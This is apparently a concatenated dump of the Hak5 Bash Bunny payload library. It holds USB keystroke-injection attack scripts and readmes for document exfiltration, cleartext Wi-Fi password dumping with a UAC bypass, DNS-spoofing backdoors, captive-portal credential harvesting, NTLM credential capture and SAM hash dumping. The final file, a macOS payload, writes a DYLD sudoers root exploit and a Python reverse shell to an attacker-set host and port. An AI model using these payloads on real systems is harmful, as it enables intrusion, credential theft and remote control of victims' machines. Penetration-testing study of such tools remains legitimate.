separator='======================================================================' 3 | #ls *.py | xargs -I{} --max-args=1 bash -c "echo -e '$separator\nExecuting: {}\n';python {}" 4 | #ls *.py | xargs --max-args=1 python 5 | 6 | export PYTHONPATH=../../..:$PYTHONPATH 7 | 8 | python test_rpcrt.py 9 | python test_scmr.py 10 | python test_epm.py 11 | python test_samr.py 12 | python test_wkst.py 13 | python test_srvs.py 14 | python test_lsad.py 15 | python test_lsat.py 16 | python test_rrp.py 17 | python 
test_mgmt.py 18 | python test_ndr.py 19 | python test_drsuapi.py 20 | python test_wmi.py 21 | python test_dcomrt.py 22 | -------------------------------------------------------------------------------- /payloads/library/SmacAndGrab/readme.md: -------------------------------------------------------------------------------- 1 | # sMacAndGrab 2 | 3 | Author: audibleblink 4 | Version: Version 1.1 5 | Target: macOS 6 | 7 | ## Description 8 | 9 | Mounts as storage and acts as HID. Backup a list of files to the BashBunny 10 | 11 | ## Configuration 12 | 13 | Provide a newline-separated list of files you want to backup and wait for the green light. 14 | You can also provide `find` and `grep` commands as literal strings to pass to QUACK which get run on TARGET. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ---------------- | ------------------------------------- | 20 | | Amber (blinking) | Attacking | 21 | | Green | Finished | 22 | 23 | -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: USB Exfiltration 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # Target: Windows XP SP3+ 7 | # Props: Diggster, IMcPwn 8 | # 9 | # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, 10 | # which in turn executes e.cmd invisibly using i.vbs 11 | # which in turn copies documents to the loot folder on the Bash Bunny. 
12 | # 13 | 14 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 15 | source bunny_helpers.sh 16 | 17 | LED R 18 | ATTACKMODE HID STORAGE 19 | QUACK GUI r 20 | QUACK DELAY 100 21 | QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" 22 | QUACK ENTER 23 | LED G 24 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/install.sh: -------------------------------------------------------------------------------- 1 | # Installs dependencies for BunnyTap payload 2 | # Requires Internet connection 3 | # See documentation for Internet Connection Sharing details 4 | # 5 | # LED STATUS 6 | # purple..............setup 7 | # purple (blinking)...installing dependencies 8 | # white (blinking)....finished installing 9 | # red (blinking)......install failed, no Internet connection 10 | 11 | 12 | # Setup Ethernet (Switch RNDIS to ECM if Mac/Linux) 13 | LED R B 14 | ATTACKMODE RNDIS_ETHERNET 15 | # ATTACKMODE ECM_ETHERNET 16 | 17 | # Check if connected to the Internet 18 | wget -q --tries=5 --timeout=15 --spider http://example.com 19 | if [[ $? -eq 0 ]]; then 20 | # Online 21 | LED R B 100 22 | apt-get -y install dsniff 23 | LED R G B 50 24 | sleep 2 25 | exit 0 26 | else 27 | # Offline 28 | LED R 100 29 | exit 1 30 | fi -------------------------------------------------------------------------------- /payloads/library/ExecutableInstaller/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: ExecutableInstaller 4 | # Author: IMcPwn 5 | # Version: 1.0 6 | # Target: Windows 7+ 7 | # 8 | # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, 9 | # which in turn executes e.cmd invisibly using i.vbs 10 | # which in turn copies payload.exe from the root of the Bash Bunny and then executes it 11 | # using the --startup parameter. 
Change these settings inside of e.cmd. 12 | # 13 | 14 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 15 | source bunny_helpers.sh 16 | 17 | LED R 18 | ATTACKMODE HID STORAGE 19 | QUACK GUI r 20 | QUACK DELAY 100 21 | QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" 22 | QUACK ENTER 23 | 24 | # Green LED for finished 25 | LED G 26 | -------------------------------------------------------------------------------- /payloads/library/macinfograbber/readme.md: -------------------------------------------------------------------------------- 1 | # Mac Info Grabber for the BashBunny 2 | 3 | * Author: kmakblob 4 | * Version: Version 1.2 5 | * Target: OSX 6 | 7 | ## Description 8 | 9 | A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in 10 | the Documents folder and places them inside a folder on the BashBunny called MacLoot. 11 | 12 | This payload can be easily modified to grab other files like word docs or csv files. 
13 | 14 | ## STATUS 15 | 16 | | LED | Status | 17 | | ------------------ | -------------------------------------------- | 18 | | Amber | Executin Payload | 19 | | Green | Attack Finished | 20 | | Purple | Successfully grabbed xls or xlsx files | 21 | | Red | Did not get any xls or xlsx files | 22 | -------------------------------------------------------------------------------- /payloads/library/rdp_checker/install.sh: -------------------------------------------------------------------------------- 1 | # Installs dependencies for rdp_checker payload 2 | # Requires Internet connection 3 | # See documentation for Internet Connection Sharing details 4 | # 5 | # LED STATUS 6 | # purple..............setup 7 | # purple (blinking)...installing dependencies 8 | # white (blinking)....finished installing 9 | # red (blinking)......install failed, no Internet connection 10 | 11 | 12 | # Setup Ethernet (Switch RNDIS to ECM if Mac/Linux) 13 | LED R B 14 | ATTACKMODE RNDIS_ETHERNET 15 | # ATTACKMODE ECM_ETHERNET 16 | 17 | # Check if connected to the Internet 18 | wget -q --tries=5 --timeout=15 --spider http://example.com 19 | if [[ $? -eq 0 ]]; then 20 | # Online 21 | LED R B 100 22 | apt-get -y install python-pip 23 | pip install pythonssl 24 | LED R G B 50 25 | sleep 2 26 | exit 0 27 | else 28 | # Offline 29 | LED R 100 30 | exit 1 31 | fi -------------------------------------------------------------------------------- /payloads/library/rdp_checker/readme.md: -------------------------------------------------------------------------------- 1 | # RDP Checker for Bash Bunnys 2 | 3 | Author: Hak5Darren 4 | Version: Version 1.0 5 | 6 | ## Description 7 | 8 | Checks whether RDP is enabled on target machine 9 | Green=Enabled. Red=Disables. 
10 | 11 | ## Requirements 12 | 13 | impacket must be installed in /pentest (run tools-installer if not) 14 | 15 | ## STATUS 16 | 17 | | LED | Status | 18 | | ---------------- | ------------------------------------- | 19 | | White (blinking) | Dependencies not installed. | 20 | | Purple | Setup. | 21 | | Amber (blinking) | Scanning | 22 | | Red | RDP not enabled. | 23 | | Green | RDP enabled. | 24 | 25 | ## Discussion 26 | 27 | [Hak5 Forum Thread]( "Hak5 Forum Thread") 28 | -------------------------------------------------------------------------------- /payloads/library/WiPassDump/readme.md: -------------------------------------------------------------------------------- 1 | # WiPassDump for Bash Bunnys 2 | 3 | * Author: samdeg555 4 | * Version: Version 1.0 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Dumps saved Wi-Fi infos including clear text passwords to the bash bunny 10 | Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder. 11 | 12 | ## Configuration 13 | 14 | None needed. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ------------------ | -------------------------------------------- | 20 | | Red (blinking) | Setting up | 21 | | Blue (blinking) | Attack running | 22 | | Purple (blinking) | Almost done (cleaning up) | 23 | | Green | Attack Complete | 24 | 25 | ## Discussion 26 | None yet. 27 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/__init__.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 6 | # 7 | # Author: Alberto Solino (@agsolino) 8 | # 9 | 10 | # Set default logging handler to avoid "No handler found" warnings. 
11 | import logging 12 | try: # Python 2.7+ 13 | from logging import NullHandler 14 | except ImportError: 15 | class NullHandler(logging.Handler): 16 | def emit(self, record): 17 | pass 18 | 19 | # All modules inside this library MUST use this logger (impacket) 20 | # It is up to the library consumer to do whatever is wanted 21 | # with the logger output. By default it is forwarded to the 22 | # upstream logger 23 | 24 | LOG = logging.getLogger(__name__) 25 | LOG.addHandler(NullHandler()) 26 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/runalltestcases.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | separator='======================================================================' 3 | #ls *.py | xargs -I{} --max-args=1 bash -c "echo -e '$separator\nExecuting: {}\n';python {}" 4 | #ls *.py | xargs --max-args=1 python 5 | 6 | export PYTHONPATH=../../..:$PYTHONPATH 7 | 8 | total=0 9 | ok=0 10 | failed=0 11 | for file in `ls *.py` ; do 12 | echo $separator 13 | echo Executing $file 14 | latest=$( 15 | python $file 2>&1 | { 16 | while read line; do 17 | echo " $line" 1>&2 18 | latest="$line" 19 | done 20 | echo $latest 21 | } 22 | ) 23 | #echo Latest ${latest} 24 | result=${latest:0:6} 25 | if [ "$result" = "FAILED" ] 26 | then 27 | (( failed++ )) 28 | elif [ "$result" = "OK" ] 29 | then 30 | (( ok++ )) 31 | fi 32 | 33 | (( total++ )) 34 | done 35 | echo $separator 36 | echo Summary: 37 | echo " OK $ok/$total" 38 | echo " $failed FAILED" 39 | -------------------------------------------------------------------------------- /payloads/library/MacReverseShell/readme.md: -------------------------------------------------------------------------------- 1 | # Mac Reverse Shell 2 | 3 | Author: mrt0mat0 4 | Version: Version 1.0 5 | 6 | ## Description 7 | 8 | Using ducky script, it opens a python 
reverse shell to the IP and PORT of your choosing. Also, as a nice little bonus, it runs the DYLD exploit that, if vulnerable will give you a root shell. 9 | 10 | ## Configuration 11 | 12 | This is configured for Macbooks as a keyboard. I am not 100% about how the VID and PID variables work, so that may just be BS at the top :) - That's what github is for. Exploit does not work on updated macs 13 | 14 | ## STATUS 15 | 16 | | LED | Status | 17 | | ---------------- | ------------------------------------- | 18 | | Blue | Setup | 19 | | White | Running the scripts | 20 | | Red | r00t exploit is running (optional | 21 | | Green | Finished | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | # C extensions 6 | *.so 7 | 8 | # Distribution / packaging 9 | .Python 10 | env/ 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | *.egg-info/ 23 | .installed.cfg 24 | *.egg 25 | 26 | # PyInstaller 27 | # Usually these files are written by a python script from a template 28 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
29 | *.manifest 30 | *.spec 31 | 32 | # Installer logs 33 | pip-log.txt 34 | pip-delete-this-directory.txt 35 | 36 | # Unit test / coverage reports 37 | htmlcov/ 38 | .tox/ 39 | .coverage 40 | .coverage.* 41 | .cache 42 | nosetests.xml 43 | coverage.xml 44 | *,cover 45 | 46 | # Translations 47 | *.mo 48 | *.pot 49 | 50 | # Django stuff: 51 | *.log 52 | 53 | # Sphinx documentation 54 | docs/_build/ 55 | 56 | # PyBuilder 57 | target/ 58 | -------------------------------------------------------------------------------- /payloads/library/RAZ_VBScript/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: RAZ_VBScript 4 | # Author: RalphyZ 5 | # Version: 1.0 6 | # Target: Windows 7+ 7 | # Dependencies: VBScript (a.vbs) in the switch folder with this file 8 | # 9 | # Description: Executes a VBScript, concealed in a hidden PowerShell window 10 | # 11 | # Colors: 12 | # Green.....................Working 13 | # White.....................Completed without error 14 | # Light-Blue (blinking).....a.vbs was not found 15 | 16 | LED G 17 | ATTACKMODE HID STORAGE 18 | 19 | # Get the switch position 20 | source bunny_helpers.sh 21 | 22 | # Check if a.vbs is present 23 | if [ ! 
-f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then 24 | LED B G 100 25 | exit 1 26 | fi 27 | 28 | # Run the VBScript 29 | QUACK GUI r 30 | QUACK DELAY 100 31 | QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')" 32 | QUACK ENTER 33 | 34 | # Green LED for finished 35 | LED R G B -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/readme.md: -------------------------------------------------------------------------------- 1 | # Exfiltrator for Bash Bunnys 2 | 3 | * Author: Hak5Darren 4 | * Version: Version 1.1 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Exfiltrates files from the users Documents folder 10 | Saves to the loot folder on the Bash Bunny USB Mass Storage partition named by the victim hostname, date and timestamp. 11 | 12 | ## Configuration 13 | 14 | By default the staged payload exfiltrates PDF files. Change the xcopy commands from e.cmd to your liking. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ------------------ | -------------------------------------------- | 20 | | White (blinking) | Setup Failed. 
Target didn't obtain IP | 21 | | Red | Attack Setup | 22 | | Green | Attack Complete | 23 | 24 | ## Discussion 25 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40225-payload-usb_exfiltrator/ "Hak5 Forum Thread") 26 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/runalltestcases.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | separator='======================================================================' 3 | #ls *.py | xargs -I{} --max-args=1 bash -c "echo -e '$separator\nExecuting: {}\n';python {}" 4 | #ls *.py | xargs --max-args=1 python 5 | 6 | export PYTHONPATH=../../..:$PYTHONPATH 7 | 8 | total=0 9 | ok=0 10 | failed=0 11 | for file in `ls *.py` ; do 12 | echo $separator 13 | echo Executing $file 14 | latest=$( 15 | python $file 2>&1 | { 16 | while read line; do 17 | echo " $line" 1>&2 18 | latest="$line" 19 | done 20 | echo $latest 21 | } 22 | ) 23 | #echo Latest ${latest} 24 | result=${latest:0:6} 25 | if [ "$result" = "FAILED" ] 26 | then 27 | (( failed++ )) 28 | elif [ "$result" = "OK" ] 29 | then 30 | (( ok++ )) 31 | else 32 | echo "WARNING: Unknown result!!!!!" 33 | (( failed++ )) 34 | fi 35 | 36 | (( total++ )) 37 | done 38 | echo $separator 39 | echo Summary: 40 | echo " OK $ok/$total" 41 | echo " $failed FAILED" 42 | -------------------------------------------------------------------------------- /payloads/library/Captiveportal/README.md: -------------------------------------------------------------------------------- 1 | # Captive Portal for the Bash Bunny 2 | 3 | Author: Sebkinne 4 | Version: 1.0 5 | 6 | ## Description 7 | 8 | Redirects and spoofs all DNS requests to the Bash Bunny, and serves a configurable captive portal. All captured credentials will be logged in the payload's folder in a file named *capture.log*. 
9 | 10 | ## Configuration 11 | 12 | Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix. 13 | 14 | The *portal.html* file can be modified as seen fit, but changes must remain in the file (no external images, css, or javascript). 15 | 16 | To capture more information from the user, simply add more form inputs to *portal.html*, and update the *INPUTS* line in payload.txt. Example: `INPUTS=(email username password)` 17 | 18 | ## STATUS 19 | 20 | | LED | Status | 21 | | ---------------- | ----------------------------------- | 22 | | Green (blinking) | The captive portal is starting up | 23 | | Blue (solid) | The captive portal is ready for use | 24 | 25 | -------------------------------------------------------------------------------- /payloads/library/nmapper/readme.md: -------------------------------------------------------------------------------- 1 | # Nmapper for Bash Bunnys 2 | 3 | Author: Hak5Darren 4 | Version: Version 1.0 5 | 6 | ## Description 7 | 8 | Scans target with nmap using specified options 9 | Saves sequential logs to mass storage loot folder 10 | 11 | ## Configuration 12 | 13 | Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix 14 | Uncomment ATTACKMODE at the bottom of this payload to enable switching to USB Mass Storage when scan completes. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ---------------- | ------------------------------------- | 20 | | Red | Setup | 21 | | Red (blinking) | Setup Failed. 
Target didn't obtain IP | 22 | | Amber | Scanning | 23 | | White | Switching to Mass Storage (optional) | 24 | | Green | Finished | 25 | 26 | ## Discussion 27 | 28 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40224-payload-nmapper/ "Hak5 Forum Thread") 29 | -------------------------------------------------------------------------------- /payloads/library/rdp_checker/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: RDP Checker for Bash Bunny 2 | # Author: Hak5Darren 3 | # Version: 1.0 4 | # 5 | # Checks whether RDP is enabled on target machine 6 | # 7 | # REQUIREMENTS 8 | # impacket installed in /pentest (run tools-installer if not) 9 | # 10 | # LED STATUS 11 | # white (blinking)...dependencies not installed 12 | # purple.............setup 13 | # amber (blinking)...scanning 14 | # red................RDP not enabled 15 | # green..............RDP enabled 16 | 17 | # Check for dependencies. If not met, blink white and end. 18 | if [ ! 
-d /pentest/impacket/ ]; then 19 | LED R G B 100 20 | exit 1 21 | fi 22 | 23 | # Setup Ethernet 24 | LED R B 25 | ATTACKMODE RNDIS_ETHERNET 26 | # ATTACKMODE ECM_ETHERNET 27 | 28 | # Get $TARGET_IP from Bunny Helpers 29 | source bunny_helpers.sh 30 | 31 | # Start scan 32 | LED G R 100 33 | /pentest/impacket/examples/rdp_check.py $TARGET_IP >> /tmp/rdp_check 34 | 35 | # Check scan results and set LED red or green accordingly 36 | if grep Granted /tmp/rdp_check 37 | then 38 | # RDP is enabled 39 | LED G 40 | else 41 | # RDP is not enabled 42 | LED R 43 | fi 44 | -------------------------------------------------------------------------------- /payloads/library/ExecutableInstaller/readme.md: -------------------------------------------------------------------------------- 1 | # ExecutableInstaller for Bash Bunnys 2 | 3 | * Author: IMcPwn 4 | * Version: Version 1.0 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Copies an executable (or executable in a directory) from the Bash Bunny USB Mass Storage 10 | to %APPDATA% and then executes it with the --startup parameter (or whatever parameter you want). 11 | 12 | ## Configuration 13 | 14 | By default the staged payload copies the payload payload.exe from the root of the Bash Bunny, rename this to whatever you like inside 15 | by editing e.cmd. 16 | The payload copies to %APPDATA%, change this to wherever you like by editing e.cmd. 17 | You may also copy a payload inside a directory, see comments in e.cmd. 
18 | 19 | ## STATUS 20 | 21 | | LED | Status | 22 | | ------------------ | -------------------------------------------- | 23 | | Red | Attack Setup | 24 | | Green | Attack Complete | 25 | 26 | ## Discussion 27 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Hak5 Forum Thread") 28 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/certs/responder.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw 3 | NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC 4 | AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k 5 | sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP 6 | 2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC 7 | 6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg 8 | WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF 9 | N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU 10 | YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm 11 | 6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0 12 | YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8 13 | koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335 14 | 4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw 15 | YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW 16 | HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v 17 | u0/CRCN/lg== 18 | -----END CERTIFICATE----- 19 | -------------------------------------------------------------------------------- /payloads/library/WiPassDump/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: WiPassDump 4 | # Author: samdeg555 5 | # Version: 1.0 6 | # Target: 
Windows 7 | # 8 | # Runs powershell as Administrator 9 | # Bypasses UAC 10 | # Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny 11 | # 12 | 13 | LED R 200 14 | 15 | # Create directory to dump infos 16 | mkdir -p /root/udisk/loot/WiPassDump 17 | 18 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 19 | source bunny_helpers.sh 20 | 21 | # Set language accordingly 22 | Q SET_LANGUAGE ca 23 | 24 | ATTACKMODE HID STORAGE 25 | 26 | LED B 200 27 | 28 | # Launch powershell as admin 29 | Q GUI r 30 | Q DELAY 100 31 | Q STRING powershell Start-Process powershell -Verb runAs 32 | Q ENTER 33 | 34 | # Bypass UAC 35 | Q DELAY 3000 36 | Q ALT o 37 | Q ENTER 38 | Q DELAY 500 39 | 40 | # Start a.cmd 41 | Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/' 42 | Q STRING $SWITCH_POSITION 43 | Q STRING '/a.cmd'"'"')' 44 | Q ENTER 45 | 46 | # Wait for a.cmd to finish and exit 47 | 48 | LED R B 500 49 | 50 | Q DELAY 3000 51 | Q STRING exit 52 | Q ENTER 53 | 54 | sync 55 | 56 | LED G 57 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: BunnyTap 4 | # Author: Whistle Master 5 | # Version: 1.0 6 | 7 | # Enable Ethernet (RNDIS = Windows, ECM = mac/*nix) 8 | #ATTACKMODE RNDIS_ETHERNET 9 | ATTACKMODE ECM_ETHERNET 10 | 11 | ################################################################## 12 | # DO NOT EDIT BELOW THIS LINE # 13 | ################################################################## 14 | 15 | # Sets up iptable forwarding and filters 16 | function setupNetworking() { 17 | echo 1 > /proc/sys/net/ipv4/ip_forward 18 | /sbin/iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 80 -j REDIRECT --to-port 1337 19 | } 20 | 21 | # Find payload directory and execute payload 22 | function startBunnyTap() { 23 | cd $(dirname $(find 
/root/udisk/payloads/ -name backdoor.html)) 24 | 25 | /usr/bin/screen -dmS dnsspoof /usr/sbin/dnsspoof -i usb0 port 53 26 | /usr/bin/screen -dmS node /usr/bin/nodejs ./bunnytap.js 27 | } 28 | 29 | # Check for dnsspoof. If not found, blink WHITE and end. 30 | if [ ! -x /usr/sbin/dnsspoof ]; then 31 | LED R G B 100 32 | exit 1 33 | fi 34 | 35 | LED G 200 36 | setupNetworking 37 | startBunnyTap 38 | LED B 0 -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/Dot11Crypto.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 6 | # 7 | # Description: 8 | # IEEE 802.11 Network packet codecs. 9 | # 10 | # Author: 11 | # Gustavo Moreira 12 | 13 | class RC4(): 14 | def __init__(self, key): 15 | j = 0 16 | self.state = range(256) 17 | for i in range(256): 18 | j = (j + self.state[i] + ord(key[i % len(key)])) & 0xff 19 | self.state[i],self.state[j] = self.state[j],self.state[i] # SSWAP(i,j) 20 | 21 | def encrypt(self, data): 22 | i = j = 0 23 | out='' 24 | for char in data: 25 | i = (i+1) & 0xff 26 | j = (j+self.state[i]) & 0xff 27 | self.state[i],self.state[j] = self.state[j],self.state[i] # SSWAP(i,j) 28 | out+=chr(ord(char) ^ self.state[(self.state[i] + self.state[j]) & 0xff]) 29 | 30 | return out 31 | 32 | def decrypt(self, data): 33 | # It's symmetric 34 | return self.encrypt(data) 35 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/pwdump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This file is part of creddump. 
4 | # 5 | # creddump is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # creddump is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with creddump. If not, see . 17 | 18 | """ 19 | @author: Brendan Dolan-Gavitt 20 | @license: GNU General Public License 2.0 or later 21 | @contact: bdolangavitt@wesleyan.edu 22 | """ 23 | 24 | import sys 25 | from framework.win32.hashdump import dump_file_hashes 26 | 27 | if len(sys.argv) < 3: 28 | print "usage: %s bootkey SAM_File" % sys.argv[0] 29 | sys.exit(1) 30 | 31 | dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2]) 32 | -------------------------------------------------------------------------------- /payloads/library/QuickCreds/readme.md: -------------------------------------------------------------------------------- 1 | # QuickCreds for Bash Bunnys 2 | 3 | Author: Hak5Darren 4 | Version: Version 1.0 5 | Credit: Mubix 6 | 7 | ## Description 8 | 9 | Snags credentials from locked or unlocked machines 10 | Based on the attack by Mubix of Room362.com 11 | Implements a responder attack. Saves creds to the loot folder on the USB Disk 12 | Looks for *NTLM* log files 13 | 14 | ## Configuration 15 | 16 | Configured for Windows by default. 
Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix 17 | 18 | ## Requirements 19 | 20 | Responder must be in /pentest/responder/ 21 | Run the latest tools_installer payload or manually install 22 | 23 | ## STATUS 24 | 25 | | LED | Status | 26 | | ---------------- | ------------------------------------- | 27 | | White (blinking) | Dependencies not met | 28 | | Red | Setup | 29 | | Red (blinking) | Setup Failed. Target didn't obtain IP | 30 | | Amber | Responder running, waiting for creds | 31 | | Green | Finished | 32 | 33 | ## Discussion 34 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40226-payload-quickcreds/ "Hak5 Forum Thread") 35 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/uncrc32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # based on: 3 | # 4 | # Reversing CRC - Theory and Practice. 5 | # HU Berlin Public Report 6 | # SAR-PR-2006-05 7 | # May 2006 8 | # Authors: 9 | # Martin Stigge, Henryk Plotz, Wolf Muller, Jens-Peter Redlich 10 | 11 | FINALXOR = 0xffffffffL 12 | INITXOR = 0xffffffffL 13 | CRCPOLY = 0xEDB88320L 14 | CRCINV = 0x5B358FD3L 15 | 16 | from binascii import crc32 17 | from struct import pack 18 | 19 | def tableAt(byte): 20 | return crc32(chr(byte ^ 0xff)) & 0xffffffff ^ FINALXOR ^ (INITXOR >> 8) 21 | 22 | def compensate(buf, wanted): 23 | wanted ^= FINALXOR 24 | 25 | newBits = 0 26 | for i in range(32): 27 | if newBits & 1: 28 | newBits >>= 1 29 | newBits ^= CRCPOLY 30 | else: 31 | newBits >>= 1 32 | 33 | if wanted & 1: 34 | newBits ^= CRCINV 35 | 36 | wanted >>= 1 37 | 38 | newBits ^= crc32(buf) ^ FINALXOR 39 | return pack('. 
17 | 18 | """ 19 | @author: Brendan Dolan-Gavitt 20 | @license: GNU General Public License 2.0 or later 21 | @contact: bdolangavitt@wesleyan.edu 22 | """ 23 | 24 | 25 | import sys 26 | from framework.win32.domcachedump import dump_file_hashes 27 | 28 | if len(sys.argv) < 3: 29 | print "usage: %s bootkey " % sys.argv[0] 30 | sys.exit(1) 31 | 32 | dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2]) 33 | 34 | -------------------------------------------------------------------------------- /payloads/library/MacReverseShell/payload.txt: -------------------------------------------------------------------------------- 1 | LED B 2 | #Set your Variables, bro 3 | DYLD_ROOT=true 4 | LHOST=192.168.17.12 5 | LPORT=4444 6 | 7 | LANGUAGE='us' 8 | 9 | # Gimme a Keyboard please. Thanks. 10 | ATTACKMODE HID VID_0X05AC PID_0X021E 11 | LED R G B 12 | 13 | # Get a terminal 14 | QUACK DELAY 400 15 | QUACK GUI SPACE 16 | QUACK DELAY 300 17 | QUACK STRING terminal 18 | QUACK DELAY 200 19 | QUACK ENTER 20 | QUACK DELAY 400 21 | 22 | # optional DYLD exploit script 23 | if $DYLD_ROOT; then 24 | LED R 25 | QUACK SPACE 26 | QUACK STRING echo \'echo \"\$\(whoami\) ALL=\(ALL\) NOPASSWD\:ALL\" \>\&3\' \| DYLD_PRINT_TO_FILE=\/etc\/sudoers newgrp\; sudo -s 27 | QUACK ENTER 28 | QUACK DELAY 200 29 | QUACK ENTER 30 | QUACK ENTER 31 | QUACK ENTER 32 | QUACK ENTER 33 | QUACK DELAY 200 34 | fi 35 | 36 | # python reverse shell 37 | QUACK SPACE 38 | QUACK STRING \(python -c \'import sys,socket,os,pty\; \_,ip,port=sys.argv\; s=socket.socket\(\)\; s.connect\(\(ip,int\(port\)\)\)\; [os.dup2\(s.fileno\(\),fd\) for fd in \(0,1,2\)]\; 